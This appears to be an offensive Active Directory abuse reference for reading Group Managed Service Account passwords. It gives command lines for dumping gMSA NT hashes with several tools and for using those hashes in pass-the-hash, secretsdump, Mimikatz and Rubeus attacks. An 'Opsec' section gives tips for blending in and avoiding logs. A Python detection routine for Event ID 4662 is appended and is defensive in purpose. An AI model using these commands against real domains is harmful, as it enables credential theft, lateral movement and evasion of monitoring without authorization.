ReadGMSAPassword

The source principal is authorized to read the msDS-ManagedPassword attribute of a Group Managed Service Account (gMSA); decoding that password blob yields the account's current NT hash.

Applies to: User/Group/Computer → Computer (gMSA object)


Linux Abuse

gMSADumper.py

# https://github.com/micahvandeusen/gMSADumper
python3 gMSADumper.py -u <username> -p '<password>' -d <domain> -l <dc-ip>

# Pass-the-Hash
python3 gMSADumper.py -u <username> -p '<ntlm-hash>' -d <domain> -l <dc-ip> --ntlm

bloodyAD

bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get search \
  --filter '(objectClass=msDS-GroupManagedServiceAccount)' \
  --attr msDS-ManagedPassword,sAMAccountName

# Pass-the-Hash
bloodyAD -u <username> -H '<ntlm-hash>' -d <domain> --host <dc-ip> get search \
  --filter '(objectClass=msDS-GroupManagedServiceAccount)' \
  --attr msDS-ManagedPassword,sAMAccountName

NetExec

netexec ldap <dc-ip> -u <username> -p '<password>' -d <domain> --gmsa

After hash retrieval: Pass-the-Hash

# Authenticate as the gMSA account
wmiexec.py -hashes ':<ntlm-hash>' '<domain>/<gmsa-account>$@<target>'
evil-winrm -i <target> -u '<gmsa-account>$' -H '<ntlm-hash>'
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<gmsa-account>$@<dc-ip>'

Kerberos ticket from gMSA hash

getTGT.py -hashes ':<ntlm-hash>' '<domain>/<gmsa-account>$'
export KRB5CCNAME=<ccache>

Windows Abuse

GMSAPasswordReader.exe

# https://github.com/rvazarkar/GMSAPasswordReader
.\GMSAPasswordReader.exe --accountname <gmsa-account>
# Output: current and previous NT hashes

DSInternals PowerShell Module

# Read the managed password blob with the AD module, then decode it with DSInternals
$gmsa = Get-ADServiceAccount -Identity '<gmsa-account>' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
# Returns the current and previous password (plus SecureString forms) and the rotation intervals
ConvertFrom-ADManagedPasswordBlob $mp

After hash retrieval

# Invoke-Mimikatz Pass-the-Hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<gmsa-account>$ /domain:<domain> /ntlm:<ntlm-hash>"'

# Rubeus overpass-the-hash
Rubeus.exe asktgt /user:<gmsa-account>$ /rc4:<ntlm-hash> /domain:<domain> /ptt

Opsec

  • Reading msDS-ManagedPassword generates Event ID 4662 (object access) on domain controllers
  • Requesting from the same context as an authorized computer account may blend in with legitimate access
  • gMSA passwords rotate automatically; hash valid until next rotation (default: 30 days)
  • Prefer Kerberos auth post-retrieval to avoid NTLM in logs
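A defender-side counterpart to the first Opsec bullet, added here and not part of the original page: a small triage routine over constructed Event ID 4662 records that flags reads of msDS-ManagedPassword and rates each one against a baseline of expected readers (the gMSA's PrincipalsAllowedToRetrieveManagedPassword). It assumes 4662 field names as in the Windows Security log, that a "Read Property" SACL exists on the gMSA objects (without it no 4662 is written at all), and that the GUID constant is the schemaIDGUID of msDS-ManagedPassword, which you should verify against your own forest schema.

```python
from typing import Dict, List, Set

# schemaIDGUID of msDS-ManagedPassword as published in the AD schema. Assumed
# value: confirm it against the schemaIDGUID attribute in your own forest.
MANAGED_PASSWORD_GUID = "e362ed86-b728-0842-b27d-2dea7a9df218"
READ_PROPERTY = 0x10  # "Read Property" bit in the 4662 AccessMask

# Baseline: who may retrieve each gMSA's password
# (its PrincipalsAllowedToRetrieveManagedPassword). Constructed sample data.
EXPECTED_READERS: Dict[str, Set[str]] = {"svc_sql$": {"SQL01$", "SQL02$"}}

def is_managed_password_read(event: Dict[str, str]) -> bool:
    """True for a 4662 property read whose Properties list names msDS-ManagedPassword."""
    if event.get("EventID") != "4662":
        return False
    if not int(event.get("AccessMask", "0x0"), 16) & READ_PROPERTY:
        return False
    return MANAGED_PASSWORD_GUID in event.get("Properties", "").lower()

def gmsa_from_dn(dn: str) -> str:
    """Map a 4662 ObjectName DN (CN=svc_sql,CN=Managed Service Accounts,...) to svc_sql$."""
    rdn = dn.split(",", 1)[0]
    return rdn[3:] + "$" if rdn.upper().startswith("CN=") else dn

def triage(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """One finding per managed-password read; 'high' when the reader is not baselined."""
    findings = []
    for ev in events:
        if not is_managed_password_read(ev):
            continue
        account = gmsa_from_dn(ev.get("ObjectName", ""))
        reader = ev.get("SubjectUserName", "")
        severity = "info" if reader in EXPECTED_READERS.get(account, set()) else "high"
        findings.append({"gmsa": account, "reader": reader, "severity": severity})
    return findings

# Constructed 4662 records (field names as in the Security log, values simplified).
_DN = "CN=svc_sql,CN=Managed Service Accounts,DC=corp,DC=example"
_PROPS = "{11111111-1111-1111-1111-111111111111} {E362ED86-B728-0842-B27D-2DEA7A9DF218}"
SAMPLE_EVENTS = [
    {"EventID": "4662", "SubjectUserName": "SQL01$", "AccessMask": "0x10",
     "ObjectName": _DN, "Properties": _PROPS},                       # expected reader
    {"EventID": "4662", "SubjectUserName": "jdoe", "AccessMask": "0x10",
     "ObjectName": _DN, "Properties": _PROPS},                       # not baselined
    {"EventID": "4662", "SubjectUserName": "jdoe", "AccessMask": "0x10",
     "ObjectName": _DN, "Properties": "{11111111-1111-1111-1111-111111111111}"},  # other attribute
    {"EventID": "4624", "SubjectUserName": "jdoe", "AccessMask": "0x10",
     "ObjectName": _DN, "Properties": _PROPS},                       # wrong event type
]
```

Reads by baselined computer accounts are the normal password-refresh traffic the second Opsec bullet describes, so the useful signal is the "high" findings from principals outside the baseline.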